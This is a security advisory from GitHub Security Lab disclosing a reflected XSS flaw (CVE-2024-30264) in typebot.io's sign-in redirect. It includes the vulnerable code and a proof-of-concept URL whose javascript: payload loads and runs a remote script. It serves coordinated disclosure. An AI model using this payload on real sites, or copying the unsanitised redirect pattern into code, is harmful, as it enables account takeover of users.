GHSL-2024-040: Cross-Site Scripting (XSS) in the sign-in page of typebot.io - CVE-2024-30264

Coordinated Disclosure Timeline

2024-03-22: Vulnerability Submitted via Private Vulnerability Reporting
2024-03-25: Vulnerability Patched
2024-04-02: CVE-2024-30264 assigned

Summary

A reflected cross-site scripting (XSS) in the sign-in page of typebot.io may allow an attacker to hijack a user’s account.

Project

typebot.io

Tested Version

v2.23.0

Details

Reflected XSS in `SignInForm.tsx` (`GHSL-2024-040`)

The sign-in page takes the redirectPath parameter from the URL. If a user clicks on a link where the redirectPath parameter has a javascript scheme, the attacker that crafted the link may be able to execute arbitrary JavaScript with the privileges of the user.

export const SignInForm = ({
  defaultEmail,
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] =
    useState<
      Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider>
    >()

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      router.replace(router.query.redirectPath?.toString() ?? '/typebots')        <------ url redirected to query parameter
      return
    }

This vulnerability was found with the help of CodeQL’s Reflected XSS Query

Impact

This issue may lead to Account Takeover.

Proof of Concept

The following link will grab a javascript file from localhost and execute it in the context of the current ___domain. An attacker can use this payload to grab javascript from his host and execute in the ___domain of the victim.

https://app.typebot.io/signin?redirectPath=javascript:var%20script%20=%20document.createElement(%27script%27);script.src%20=%20%27http://127.0.0.1:8765/alert.js%27;%20document.head.appendChild(script);#//

CVE

CVE-2024-30264

Resources

https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-mx2f-9mcr-8j73

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-040 in any communication regarding this issue.